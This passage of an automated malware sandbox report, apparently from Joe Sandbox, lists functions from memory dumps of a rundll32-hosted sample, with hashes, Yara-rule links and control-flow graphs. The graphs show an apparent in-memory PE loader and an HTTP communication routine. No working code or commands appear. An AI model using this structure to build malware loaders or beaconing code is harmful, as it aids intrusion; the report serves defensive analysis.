                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFirstSnapshotThread32Toolhelp32
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 490256885-0
                                                                                                                                                                                                                            • Opcode ID: 194a83f98997e6115fdfa67c3893d78de7fc9e6bba17d4b3dc6bce5c589a6293
                                                                                                                                                                                                                            • Instruction ID: 2f5e439efed123e88f8c478f175aaf9c1a26f47a52f1fab117cfc48d9bfa5b09
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 194a83f98997e6115fdfa67c3893d78de7fc9e6bba17d4b3dc6bce5c589a6293
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09728370118B488FE7E4EF18D899BA577E0FB98305F2146BD944DC7396CB34A846CB82
                                                                                                                                                                                                                            Function 0000029F3B8E17B0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9231c388db8ee475d6ab8ee3ba172462a16947c930e6710b7ccf33ff41c9ef65
                                                                                                                                                                                                                            • Instruction ID: f290be8e498212d3b41c4a0378a789611386cb89ef11b96a803bb6020747984d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9231c388db8ee475d6ab8ee3ba172462a16947c930e6710b7ccf33ff41c9ef65
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35C1D330218A898FE794FF18D8687F9B7E1FB59301F5002ADE48AC3292DB789952C745
                                                                                                                                                                                                                            Function 0000029F3B8E71B0 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3bf805ae0e62c2845af3c7654a6490de1b96e80111605b893775269a0522167f
                                                                                                                                                                                                                            • Instruction ID: f0a3540b7b8db4ec9e0c8414911313b39fc3a1fa838fc9f330bf17aa32f280c1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bf805ae0e62c2845af3c7654a6490de1b96e80111605b893775269a0522167f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE4172701246488FE388EF28D9597A6B7E1FB48305F5046ADE45AC33D2CB7C8846CB45
                                                                                                                                                                                                                            Function 0000029F3B914360 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                                                                                            • Instruction ID: 53076f43db5ebf689e410fa8d2cbfbb1f15a8c576df7d35b012ac170e9d01689
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC414EB151CB888FE6B4AF08A8467FAB7E0FBC9721F10456FD5C9C3251D635A4428BC6
                                                                                                                                                                                                                            Function 0000029F3B9145F0 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 7425b9f205f2e48f6743ce85b3d4803992b94f2dd7c42288ff67dbf43d2a16d5
                                                                                                                                                                                                                            • Instruction ID: fa4385895fe9c995aef66a58df29271df0cf31f7694dc877d48566c05416580a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7425b9f205f2e48f6743ce85b3d4803992b94f2dd7c42288ff67dbf43d2a16d5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA21837061DB858BE794EB0898567BAB7E4FBC8766F20092FE448C3350D6349441CB87
                                                                                                                                                                                                                            Function 0000029F3B913F40 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                                                                                            • Instruction ID: 8cd7870e63d6f1b50362d4636fc050ee1d5424305632f3a00222d7feb97e9bc1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B11A23061D7889FF794AB18985A7B6B7E0FB98322F10496FE488C2350D679A4908787
                                                                                                                                                                                                                            Function 0000029F3B9151C0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c9efb2dc69225788838bd08ce1b571aed7e5ff7df66dff9cf99eed66fee9a7a8
                                                                                                                                                                                                                            • Instruction ID: c68549aeec9938e4b244c125e4fef732e3201cc8dd49254d08aaf4e98ec2cc75
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9efb2dc69225788838bd08ce1b571aed7e5ff7df66dff9cf99eed66fee9a7a8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7411C470668B884FEAD4EF08985A7B973E4E788316F40492EE889C2350D679E4418B87
                                                                                                                                                                                                                            Function 0000029F3B914BE0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                                                                                            • Instruction ID: 1354727335f7dfbb5ee5f025240a897c520b1a10cf7451d818560171efae9385
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE11B630658B898FE694AF48945B7B573D4FB8C316F40456ED449C2350D679A4408B87
                                                                                                                                                                                                                            Function 0000029F3B7DDACE Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                            • Instruction ID: 6c139a1f88cf781c50ffe2d41ead4932c9089ff5a6898ee5ac953c6e4ecafc64
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D311F970618B888FD6A0DF4998897AAB7E1FBD8711F54066FE48CD3210C7319841C793
                                                                                                                                                                                                                            Function 0000029F3B8F7A50 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                                                                                            • Instruction ID: 9cb584d81d4e89e0b797c2af70c132a6ebaff2edf6c402d3e97cd3fc16bfd66f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46113A70118BC84FF7E0AA18F55E77A73C0F788316F50066DE989C22C1EBB9955A8647
                                                                                                                                                                                                                            Function 0000029F3B914FF0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                                                                                            • Instruction ID: 1fe70f66573b23926d77a1c7b794883b48e449356706c126895479869351af47
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6611E730619B888FEB94AF48985BBB977E4F749312F40046EE449C2390D739E440CAC7
                                                                                                                                                                                                                            Function 0000029F3B914740 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                                                                                            • Instruction ID: eff7e84a1e756b43126cbe68909f7d8e705942537d0f9e0248f277c8f669832d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5601DB30628B458FF7C8BB1894273B573E1F789711F10456EE449C3391D639E9414E87
                                                                                                                                                                                                                            Function 0000029F3B7DD98E Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                            • Instruction ID: bb0a8d686d3f5a4e88d1126d7d54a4174b7ab0ff1ebbc7a5a569bcff71bfad6a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF0F470618B448BE384DF1884C923677E1FBD8746F24052EE899C7361CB319842CB47
                                                                                                                                                                                                                            Function 0000029F3B7DD9FE Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                            • Instruction ID: 4b43620edf0ed56e9615379ca488d5bcf9a2a716fef1c2922ec0e125c49af9b9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF0A470628B408BE784DF1884CA67677E1FBD8746F24452EE899C7361CB3598828B47
                                                                                                                                                                                                                            Function 0000029F3B7DDA6E Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                            • Instruction ID: af0ab48d7d17c9110e02221fb5d531b79efa5379ad74c5b37b7098bdcc57f71e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0B470A28F444BC744AF2C884EA7533D2FBE8646F54463EE448C7361CB35E8428B83
                                                                                                                                                                                                                            Function 0000029F3B8F8149 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                            • Instruction ID: d84466c778245787f7d2b0df6ccf95e0f148e985b154a7e242bd8c1b128bc74f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D05E7248DA584DE6609A98B4473F4B3D0E780324F40482EC18CC1143D63E40464706
                                                                                                                                                                                                                            Function 0000029F3B752050 Relevance: 22.8, APIs: 15, Instructions: 324COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 0 29f3b752050-29f3b75209a call 29f3b751340 3 29f3b7520a3-29f3b7520bd 0->3 4 29f3b75209c-29f3b75209e 0->4 6 29f3b7520bf-29f3b7520cc SetLastError 3->6 7 29f3b7520d1-29f3b7520fa call 29f3b751340 3->7 5 29f3b752640-29f3b752647 4->5 6->5 10 29f3b752103-29f3b75212a 7->10 11 29f3b7520fc-29f3b7520fe 7->11 12 29f3b75212c-29f3b752139 SetLastError 10->12 13 29f3b75213e-29f3b75214c 10->13 11->5 12->5 14 29f3b752160-29f3b75216d 13->14 15 29f3b75214e-29f3b75215b SetLastError 13->15 16 29f3b75216f-29f3b75217c SetLastError 14->16 17 29f3b752181-29f3b7521b1 14->17 15->5 16->5 18 29f3b7521cb-29f3b7521d8 17->18 19 29f3b75222b-29f3b752286 GetNativeSystemInfo 18->19 20 29f3b7521da-29f3b7521e3 18->20 23 29f3b752288-29f3b752295 SetLastError 19->23 24 29f3b75229a-29f3b7522c5 VirtualAlloc 19->24 21 29f3b7521e5-29f3b7521fa 20->21 22 29f3b7521fc-29f3b75220e 20->22 25 29f3b752213-29f3b75221d 21->25 22->25 23->5 26 29f3b7522ff-29f3b752324 GetProcessHeap HeapAlloc 24->26 27 29f3b7522c7-29f3b7522eb VirtualAlloc 24->27 30 29f3b75221f-29f3b752224 25->30 31 29f3b752229 25->31 28 29f3b752326-29f3b752346 VirtualFree SetLastError 26->28 29 29f3b75234b-29f3b752369 26->29 27->26 32 29f3b7522ed-29f3b7522fa SetLastError 27->32 28->5 33 29f3b752375 29->33 34 29f3b75236b-29f3b752373 29->34 30->31 31->18 32->5 36 29f3b75237d-29f3b7523fe call 29f3b751340 33->36 34->36 39 29f3b752400 36->39 40 29f3b75240a-29f3b7524a7 VirtualAlloc call 29f3b751120 call 29f3b751380 36->40 41 29f3b75262c-29f3b75263e call 29f3b7528e0 39->41 47 29f3b7524ac-29f3b7524ae 40->47 41->5 48 29f3b7524b0 47->48 49 29f3b7524ba-29f3b7524e3 47->49 48->41 50 29f3b7524e5-29f3b752507 call 29f3b751ab0 49->50 51 29f3b752509-29f3b75250e 49->51 53 29f3b752515-29f3b752529 call 29f3b751c80 50->53 51->53 57 29f3b752535-29f3b752549 call 29f3b751790 53->57 58 29f3b75252b 53->58 61 29f3b752555-29f3b752569 call 29f3b7519f0 57->61 62 29f3b75254b 57->62 58->41 65 29f3b752575-29f3b752581 61->65 66 29f3b75256b 61->66 62->41 67 29f3b752618-29f3b75261d 65->67 68 29f3b752587-29f3b752590 65->68 66->41 71 29f3b752625-29f3b75262a 67->71 69 29f3b752592-29f3b7525d8 68->69 70 29f3b7525f7-29f3b752612 68->70 74 29f3b7525da-29f3b7525e5 SetLastError 69->74 75 29f3b7525e9-29f3b7525f5 69->75 72 29f3b752616 70->72 71->5 71->41 72->71 74->41 75->72
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                            • Opcode ID: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                            • Instruction ID: 2aec68063e7d132e466de575bc482b49a3318ffbbb82e4bd8d9807fe74732fa6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9F1FC3661DBC486D7E09B15E5A476AB7A0F3C8B81F11106AEA9E83B64DF3DC444CB44
                                                                                                                                                                                                                            Function 0000029F3B8E7830 Relevance: 9.3, APIs: 6, Instructions: 340networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 151 29f3b8e7830-29f3b8e7883 152 29f3b8e788a-29f3b8e7892 InternetOpenW 151->152 153 29f3b8e7885-29f3b8e7888 151->153 154 29f3b8e7af9-29f3b8e7afd 152->154 155 29f3b8e7898-29f3b8e78d7 InternetConnectW 152->155 153->152 156 29f3b8e7aff-29f3b8e7b0c 154->156 155->154 157 29f3b8e78dd-29f3b8e792b HttpOpenRequestW 155->157 158 29f3b8e7b0e-29f3b8e7b11 InternetCloseHandle 156->158 159 29f3b8e7b17-29f3b8e7b1a 156->159 157->156 160 29f3b8e7931-29f3b8e793b 157->160 158->159 163 29f3b8e7b1c-29f3b8e7b1d 159->163 164 29f3b8e7b25-29f3b8e7b28 159->164 161 29f3b8e793d-29f3b8e7945 160->161 162 29f3b8e7990-29f3b8e79ab 160->162 161->162 165 29f3b8e7947-29f3b8e798b call 29f3b912750 * 2 161->165 162->156 174 29f3b8e79b1-29f3b8e79ba 162->174 163->164 166 29f3b8e7b2a-29f3b8e7b2b 164->166 167 29f3b8e7b33-29f3b8e7b3b 164->167 165->162 166->167 170 29f3b8e7b41-29f3b8e7b4b 167->170 171 29f3b8e7bd0-29f3b8e7be3 167->171 172 29f3b8e7b4d-29f3b8e7b54 call 29f3b911230 170->172 173 29f3b8e7b62-29f3b8e7b73 170->173 172->173 185 29f3b8e7b56-29f3b8e7b60 call 29f3b90b4e0 172->185 179 29f3b8e7b7a-29f3b8e7b8a call 29f3b8ecb60 173->179 180 29f3b8e7b75-29f3b8e7b78 173->180 177 29f3b8e79bc-29f3b8e79de call 29f3b911270 HttpSendRequestA 174->177 178 29f3b8e79e6-29f3b8e7a0a 174->178 177->156 191 29f3b8e79e4-29f3b8e7a16 177->191 194 29f3b8e7a0c 178->194 192 29f3b8e7b8c-29f3b8e7bb8 call 29f3b8ea050 call 29f3b90b4e0 179->192 193 29f3b8e7bba-29f3b8e7bce call 29f3b911410 179->193 180->171 180->179 185->171 202 29f3b8e7a18-29f3b8e7a1f call 29f3b90b4e0 191->202 203 29f3b8e7a24-29f3b8e7a3b call 29f3b90b4c0 191->203 192->171 193->171 193->185 194->177 202->203 209 29f3b8e7a3f-29f3b8e7a5b InternetQueryDataAvailable 203->209 210 29f3b8e7ae3-29f3b8e7af7 call 29f3b90b4e0 209->210 211 29f3b8e7a61-29f3b8e7a69 209->211 210->158 211->210 213 29f3b8e7a6b-29f3b8e7a7e 211->213 213->210 216 29f3b8e7a80-29f3b8e7a86 213->216 216->210 217 29f3b8e7a88-29f3b8e7a96 216->217 218 29f3b8e7aac-29f3b8e7aaf call 29f3b90b4c0 217->218 219 29f3b8e7a98-29f3b8e7aaa 217->219 222 29f3b8e7ab4-29f3b8e7ade call 29f3b9044a0 218->222 219->222 222->209
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$HttpOpenRequest$AvailableCloseConnectDataFreeHandleHeapQuerySend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3768145577-0
                                                                                                                                                                                                                            • Opcode ID: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                                                                                                                                                                            • Instruction ID: e4481fc6bca63d848faf896e87827343f7ebb58f0e3dfb68e775c8de37802899
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4B1A534218A488FE7D4FB18D86977AB7D5FB98301F0406BDA84AC3291DF78D8428786
                                                                                                                                                                                                                            Function 0000029F3B7DCABE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 323COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 0$@$@$`
                                                                                                                                                                                                                            • API String ID: 0-307318802
                                                                                                                                                                                                                            • Opcode ID: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                            • Instruction ID: dfad4ec15d4a512eb4da1bdb9141e9cbcdf1bd8384b6b2e90b728433c483e8fd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6B1837061CB888FD7A4EF18D445BAAB7E0FB98351F104A6EE49DC3291DB34D944CB86
